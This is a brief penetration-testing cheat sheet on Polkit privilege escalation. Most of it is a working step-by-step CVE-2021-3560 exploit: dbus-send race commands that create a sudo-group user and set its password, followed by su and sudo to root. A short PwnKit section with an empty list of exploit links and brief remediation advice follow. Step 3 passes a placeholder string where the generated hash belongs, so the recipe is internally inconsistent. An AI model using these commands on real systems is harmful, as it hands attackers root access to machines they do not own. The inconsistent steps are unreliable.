# PolKit Privilege Escalation Polkit (PolicyKit) is a component for controlling system-wide privileges in Unix-like operating systems.\ It provides an organized way for non-privileged processes to communicate with privileged ones. ### CVE-2021-3560 #### 1. Send a dbus message to create a new user Create a new user by sending a dbus message. ```shellscript # string:tester: The new user named "tester". # string:"Tester Account": The description of the new user. # int32:1: sudo group dbus-send --system --dest=org.freedesktop.Accounts --type=method_call --print-reply /org/freedesktop/Accounts org.freedesktop.Accounts.CreateUser string:tester string:"Tester Account" int32:1 & sleep 0.005s; kill $! ``` Then check the new user ID (uid). ```shellscript id tester uid=1000(tester) gid=1000(tester) groups=1000(tester),27(sudo) ``` #### 2. Generate a new password hash ```shellscript # -6: SHA512 openssl passwd -6 password123 ``` Copy the output hash. #### 3. Send a dbus message to set a new password ``` dbus-send --system --dest=org.freedesktop.Accounts --type=method_call --print-reply /org/freedesktop/Accounts/User1000 org.freedesktop.Accounts.User.SetPassword string:'' string:'Ask the tester' & sleep 0.005s; kill $! ``` #### 4. Switch the new user ``` su tester ``` Enter the password you created e.g. “password123”.\ Now change to root . ``` sudo -s # or sudo su root ``` ### CVE-2021-4034 (PwnKit) PwnKit is vulnerability of Polkit to local privilege escalation.\ There are many exploits available. Below are examples: * * * * (this is written by Python) ### Remediations To avoid the vulnerability, unset setuid from the pkexec executable. ``` sudo chmod 0755 /usr/bin/pkexec # or sudo chmod 0755 `which pkexec` ``` Or simply upgrade the apt packages in most of distributions which are patched for the vulnerability. ``` sudo apt update && sudo apt upgrade ``` ### References * [Qualys](https://www.qualys.com/2022/01/25/cve-2021-4034/pwnkit.txt)